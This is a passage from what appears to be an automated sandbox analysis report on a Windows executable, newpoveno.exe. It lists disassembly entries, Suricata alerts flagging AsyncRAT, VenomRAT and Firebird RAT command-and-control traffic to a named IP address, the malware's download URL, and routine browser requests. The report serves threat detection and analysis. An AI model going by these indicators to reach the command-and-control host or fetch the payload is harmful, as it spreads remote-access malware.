                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push rdi22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA167F9B00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA1687F720
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA168294C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168294C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168294C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16829B40
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebp22_2_00007FFA169E7BE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16829C00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA16829A80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16A027B0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then xor eax, eax22_2_00007FFA167FA2E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA168E4120
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16A02D30
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]27_2_00007FF6CFFB7400
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]27_2_00007FF6CFFB9890
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push rdi27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20D79B00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20E64120
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then xor eax, eax27_2_00007FFA20D7A2E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20F827B0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20F82D30
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA94C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA94C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA94C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DFF720
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA9A80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebp27_2_00007FFA20F67BE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20DA9B40
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20DA9C00

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49709
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49712
                            Source: Network trafficSuricata IDS: 2029606 - Severity 1 - ET MALWARE MSIL/Firebird RAT CnC Checkin : 192.168.2.9:49720 -> 176.65.142.74:4448
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49872
                            Enables network access during safeboot for specific services
                            Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                            Source: global trafficTCP traffic: 192.168.2.9:49700 -> 176.65.142.74:4448
                            Source: global trafficTCP traffic: 192.168.2.9:53059 -> 1.1.1.1:53
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
                            Source: Joe Sandbox ViewIP Address: 149.137.136.16 149.137.136.16
                            Source: Joe Sandbox ViewASN Name: WEBTRAFFICDE WEBTRAFFICDE
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49705 -> 13.107.246.60:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 13.107.246.60:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 13.107.246.60:443
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.73.143
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.58.206.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.58.206.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.58.206.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.58.206.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 216.58.206.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: unknownTCP traffic detected without corresponding DNS query: 176.65.142.74
                            Source: global trafficHTTP traffic detected: GET /file/newuploavir/newpoveno.zip HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f005.backblazeb2.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                            Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx3PMR7YziqUHWUd9Aoisl-XiA2mVhBxonBR7vVg9-aWDJe8U10oul-o9rHz94bax4XYEDx4GFDnPrOf6wNeaxiIrsCpm9JkhGjpBxp3A41ZclHsUrMgMX7_usY-fuHjAMZSmuUbzRBVG-37MCQJS78AvozLrZ6uzg/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_3_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=2uG2VFED6ypAznO5RJD6WOOL42-eLOxDhw2Bc9iCuuum5p92eiKiZUJshVo97vbb35KDd-q6jtucQ-KnMtD-gohU57QjLNEUZE1ubdYGU4MhAaHB4-SilZEIbc5imMRqjVfYiRXSairzA3RcP0A8S4GF82Zxg6j2alHakWkrEP97EJeFSSqW5svCa1pEPoVNGFHGZfYbjQ
                            Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=2uG2VFED6ypAznO5RJD6WOOL42-eLOxDhw2Bc9iCuuum5p92eiKiZUJshVo97vbb35KDd-q6jtucQ-KnMtD-gohU57QjLNEUZE1ubdYGU4MhAaHB4-SilZEIbc5imMRqjVfYiRXSairzA3RcP0A8S4GF82Zxg6j2alHakWkrEP97EJeFSSqW5svCa1pEPoVNGFHGZfYbjQ
                            Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=2uG2VFED6ypAznO5RJD6WOOL42-eLOxDhw2Bc9iCuuum5p92eiKiZUJshVo97vbb35KDd-q6jtucQ-KnMtD-gohU57QjLNEUZE1ubdYGU4MhAaHB4-SilZEIbc5imMRqjVfYiRXSairzA3RcP0A8S4GF82Zxg6j2alHakWkrEP97EJeFSSqW5svCa1pEPoVNGFHGZfYbjQ
                            Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=2uG2VFED6ypAznO5RJD6WOOL42-eLOxDhw2Bc9iCuuum5p92eiKiZUJshVo97vbb35KDd-q6jtucQ-KnMtD-gohU57QjLNEUZE1ubdYGU4MhAaHB4-SilZEIbc5imMRqjVfYiRXSairzA3RcP0A8S4GF82Zxg6j2alHakWkrEP97EJeFSSqW5svCa1pEPoVNGFHGZfYbjQ
                            Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&firstlaunch=1 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.1e1de479ffc2b85d14c8.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 350sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; MUIDB=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1
                            Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 350sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; MUIDB=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1
                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.cb5d86730a0bdbdd55a4.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.c1f2f2c818c03b7d76c6.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
